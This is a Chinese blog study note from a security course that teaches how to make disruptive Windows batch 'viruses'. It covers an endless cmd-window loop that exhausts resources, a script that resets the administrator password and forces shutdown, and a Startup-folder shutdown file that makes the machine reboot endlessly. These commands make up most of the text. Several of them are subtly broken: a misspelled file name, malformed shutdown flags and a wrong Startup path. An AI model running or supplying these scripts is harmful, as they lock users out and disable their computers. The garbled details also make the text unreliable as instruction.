泷羽sec学习打卡-Windows基础virus

声明
学习视频来自B站UP主 泷羽sec,如涉及侵权马上删除文章 笔记的只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负


关于windows virus的那些事儿


一、Windows-Virus

资源耗尽之无限弹窗cmd-virus测试

将start cmd命令写入到cmd.txt文件中

csharp 复制代码
echo start cmd >cmd.txt

追加>>将%0写入到cmd.txt文件中

csharp 复制代码
echo %0 >> cmd.txt

查看cmd.txt文件内容

type cmd.txt

重命名 cmd.txt文件更改未cmd.bat批处理文件

csharp 复制代码
ren cdm.txt cmd.bat

执行cmd.bat文件

python 复制代码
call c:\users\root cmd.bat

锁机virus测试

net user administrator 123456写入到c:\windows\Temp\virus.bat批处理文件中

python 复制代码
echo net user administrator syssys > c:\windows\Temp\text.txt
net user administrator 123456:更改用户administrator的password

shutdown /s /t /f 0追加写入c:\windows\Temp\text.txt批处理文件中

python 复制代码
echo shutdown /s /t /f 0 >> c:\windows\Temp\text.txt

注意:win7没有/n这个参数,这个/n是linux中的
shutdown /n /t 0:直接0s立即执行关闭主机

/n:这个选项是不调用 init 程序进行关机,而是由 shutdown 命令自己直接进行关机。

init 命令是 Unix 和类 Unix 操作系统(如 Linux)中的一个系统级命令,用于初始化系统或改变运行级别。

查看指定路径下的text.txt文件内容

python 复制代码
type c:\windows\Temp\text.txt

切换到指定文件路径

python 复制代码
cd c:\windows\Temp

重命令文件并更改格式txt为bat

python 复制代码
ren text.txt test.bat
dir 查看路径c:\windows\Temp所有目录以及文件

缺点太过明显,需要指定路径才能运行,其次call文件需要等待上一个bat程序执行完才会执行,其次需要管理员权限运行cmd

使用新命令:新建cmd窗口执行bat,也多一个进程

python 复制代码
cmd /c c:\windows\Temp\test.bat

这个登录的时候必须是超级管理员用户才会生效,使用其它权限用户依然可以登录,所以理论上成立,实际还需要更改为所有用户才行。

无限重启virus测试

写入立即执行关闭命令到my.bat

csharp 复制代码
echo shutdown /s /t 0 > c:\windows\Temp\my.bat

用是将c:\windows\Temp目录下的my.bat文件复制到当前用户的启动文件夹中,使得每次计算机启动时,my.bat文件都会被执行。

csharp 复制代码
copy c:\windows\Temp\my.bat "%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

开机自启动目录

csharp 复制代码
"%USERPROFILE%\AppData\Roaming\Microsoft\windows\Start\Menu\Programs\Startup\"

重启自动清空缓存测试

csharp 复制代码
c:\windows\Temp\my.bat 

好好好,看来限制是非常多,在win10中首先路径需要正确,其次需要有超级管理员的权限才可以。分享就到这里,下来实践。

还是那句话

实践是检验真理的唯一标准

相关推荐
2303_Alpha9 分钟前
SpringBoot
笔记·学习
萘柰奈17 分钟前
Unity学习----【进阶】TextMeshPro学习(三)--进阶知识点(TMP基础设置,材质球相关,两个辅助工具类)
学习·unity
贾维思基25 分钟前
被监管警告后,我连夜给系统上了“双保险”!
安全
沐矢羽38 分钟前
Tomcat PUT方法任意写文件漏洞学习
学习·tomcat
好奇龙猫39 分钟前
日语学习-日语知识点小记-进阶-JLPT-N1阶段蓝宝书,共120语法(10):91-100语法+考え方13
学习
向阳花开_miemie1 小时前
Android音频学习(十八)——混音流程
学习·音视频
工大一只猿1 小时前
51单片机学习
嵌入式硬件·学习·51单片机
00后程序员张1 小时前
iOS App 混淆与加固对比 源码混淆与ipa文件混淆的区别、iOS代码保护与应用安全场景最佳实践
android·安全·ios·小程序·uni-app·iphone·webview
c0d1ng2 小时前
量子计算学习(第十四周周报)
学习·量子计算
路由侠内网穿透3 小时前
本地部署 GPS 跟踪系统 Traccar 并实现外部访问
运维·服务器·网络·windows·tcp/ip